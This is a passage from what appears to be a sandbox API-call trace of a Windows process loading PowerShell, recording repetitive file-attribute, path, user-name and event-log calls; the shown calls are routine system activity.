lpFileSystemNameBuffer="NTFS") returned 1 [0146.250] GetLastError () returned 0xcb [0146.250] SetErrorMode (uMode=0x1) returned 0x1 [0146.250] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.250] GetLastError () returned 0xcb [0146.250] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24df10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.250] GetLastError () returned 0xcb [0146.250] SetErrorMode (uMode=0x1) returned 0x1 [0146.250] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3443408 | out: lpFileInformation=0x3443408*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.250] GetLastError () returned 0xcb [0146.250] SetErrorMode (uMode=0x1) returned 0x1 [0146.250] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24df10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.250] GetLastError () returned 0xcb [0146.250] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24de9c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.250] GetLastError () returned 0xcb [0146.250] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.251] GetLastError () returned 0xcb [0146.252] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24de58, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.252] GetLastError () returned 0xcb [0146.252] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.252] GetLastError () returned 0xcb [0146.253] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24de60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.253] GetLastError () returned 0xcb [0146.253] SetErrorMode (uMode=0x1) returned 0x1 [0146.253] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3444060 | out: lpFileInformation=0x3444060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.253] GetLastError () returned 0xcb [0146.253] SetErrorMode (uMode=0x1) returned 0x1 [0146.253] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24de68, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.253] GetLastError () returned 0xcb [0146.253] SetErrorMode (uMode=0x1) returned 0x1 [0146.253] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x34441b0 | out: lpFileInformation=0x34441b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.253] GetLastError () returned 0xcb [0146.253] SetErrorMode (uMode=0x1) returned 0x1 [0146.253] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24deac, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.253] GetLastError () returned 0xcb [0146.253] SetErrorMode (uMode=0x1) returned 0x1 [0146.253] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x3444350 | out: lpFileInformation=0x3444350*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.253] GetLastError () returned 0xcb [0146.253] SetErrorMode (uMode=0x1) returned 0x1 [0146.253] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.254] GetLastError () returned 0xcb [0146.254] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.254] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3447084*="FileSystem", lpRawData=0x3446f40) returned 1 [0146.262] GetLastError () returned 0x0 [0146.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.263] GetLastError () returned 0xcb [0146.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.263] GetLastError () returned 0xcb [0146.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.263] GetLastError () returned 0xcb [0146.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.263] GetLastError () returned 0xcb [0146.264] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.264] GetLastError () returned 0xcb [0146.264] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.264] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x344b120*="Function", lpRawData=0x344afdc) returned 1 [0146.267] GetLastError () returned 0x0 [0146.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.269] GetLastError () returned 0xcb [0146.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.336] GetLastError () returned 0xcb [0146.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.336] GetLastError () returned 0xcb [0146.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.336] GetLastError () returned 0xcb [0146.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.336] GetLastError () returned 0xcb [0146.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.401] GetLastError () returned 0xcb [0146.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.401] GetLastError () returned 0xcb [0146.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.401] GetLastError () returned 0xcb [0146.404] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.405] GetLastError () returned 0xcb [0146.405] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.405] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3464188*="Registry", lpRawData=0x3464044) returned 1 [0146.416] GetLastError () returned 0x0 [0146.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.417] GetLastError () returned 0x0 [0146.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.417] GetLastError () returned 0x0 [0146.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.417] GetLastError () returned 0x0 [0146.453] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.453] GetLastError () returned 0x0 [0146.453] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.453] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3467f1c*="Variable", lpRawData=0x3467dd8) returned 1 [0146.454] GetLastError () returned 0x0 [0146.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.456] GetLastError () returned 0xcb [0146.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.457] GetLastError () returned 0xcb [0146.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24de34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.459] GetLastError () returned 0xcb [0146.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.459] GetLastError () returned 0xcb [0146.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.459] GetLastError () returned 0xcb [0146.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24dde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0146.459] GetLastError () returned 0xcb [0146.558] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x338b50, nSize=0x24e434 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x24e434) returned 0x1 [0146.558] GetLastError () returned 0x3 [0146.559] GetUserNameW (in: lpBuffer=0x338390, pcbBuffer=0x24e43c | out: lpBuffer="aETAdzjz", pcbBuffer=0x24e43c) returned 1 [0146.559] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3475db4*="Certificate", lpRawData=0x3475c70) returned 1 [0146.568] GetLastError () returned 0x0 [0146.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.575] GetLastError () returned 0xcb [0146.581] GetLogicalDrives () returned 0x4 [0146.581] GetLastError () returned 0xcb [0146.581] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24dfac, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.581] GetLastError () returned 0xcb [0146.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.581] GetLastError () returned 0xcb [0146.582] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x338390 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0146.582] GetLastError () returned 0xcb [0146.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.583] GetLastError () returned 0xcb [0146.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.584] GetLastError () returned 0xcb [0146.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.647] GetLastError () returned 0xcb [0146.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.681] GetLastError () returned 0xcb [0146.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.682] GetLastError () returned 0xcb [0146.682] SetErrorMode (uMode=0x1) returned 0x1 [0146.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x347ccd4 | out: lpFileInformation=0x347ccd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.682] GetLastError () returned 0xcb [0146.682] SetErrorMode (uMode=0x1) returned 0x1 [0146.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.682] GetLastError () returned 0xcb [0146.682] SetErrorMode (uMode=0x1) returned 0x1 [0146.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x347ce68 | out: lpFileInformation=0x347ce68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.683] GetLastError () returned 0xcb [0146.683] SetErrorMode (uMode=0x1) returned 0x1 [0146.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.688] GetLastError () returned 0xcb [0146.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.698] GetLastError () returned 0xcb [0146.699] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24dec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.699] GetLastError () returned 0xcb [0146.699] SetErrorMode (uMode=0x1) returned 0x1 [0146.699] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24e340 | out: lpFileInformation=0x24e340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.699] GetLastError () returned 0xcb [0146.699] SetErrorMode (uMode=0x1) returned 0x1 [0146.699] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24dec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.699] GetLastError () returned 0xcb [0146.699] SetErrorMode (uMode=0x1) returned 0x1 [0146.699] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24e340 | out: lpFileInformation=0x24e340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0146.699] GetLastError () returned 0xcb [0146.699] SetErrorMode (uMode=0x1) returned 0x1 [0146.699] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ded4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.699] GetLastError () returned 0xcb [0146.699] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24de70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0146.699] GetLastError () returned 0xcb [0146.699] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.699] GetLastError () returned 0xcb [0146.699] SetErrorMode (uMode=0x1) returned 0x1 [0146.699] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24e340 | out: lpFileInformation=0x24e340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.699] GetLastError () returned 0xcb [0146.699] SetErrorMode (uMode=0x1) returned 0x1 [0146.699] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.699] GetLastError () returned 0xcb [0146.700] SetErrorMode (uMode=0x1) returned 0x1 [0146.700] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24e340 | out: lpFileInformation=0x24e340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.700] GetLastError () returned 0xcb [0146.700] SetErrorMode (uMode=0x1) returned 0x1 [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.700] GetLastError () returned 0xcb [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24de70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.700] GetLastError () returned 0xcb [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.700] GetLastError () returned 0xcb [0146.700] SetErrorMode (uMode=0x1) returned 0x1 [0146.700] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24e340 | out: lpFileInformation=0x24e340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.700] GetLastError () returned 0xcb [0146.700] SetErrorMode (uMode=0x1) returned 0x1 [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.700] GetLastError () returned 0xcb [0146.700] SetErrorMode (uMode=0x1) returned 0x1 [0146.700] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24e340 | out: lpFileInformation=0x24e340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.700] GetLastError () returned 0xcb [0146.700] SetErrorMode (uMode=0x1) returned 0x1 [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ded4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.700] GetLastError () returned 0xcb [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24de70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.700] GetLastError () returned 0xcb [0146.700] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24decc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.700] GetLastError () returned 0xcb [0146.701] SetErrorMode (uMode=0x1) returned 0x1 [0146.701] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24e34c | out: lpFileInformation=0x24e34c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.701] GetLastError () returned 0xcb [0146.701] SetErrorMode 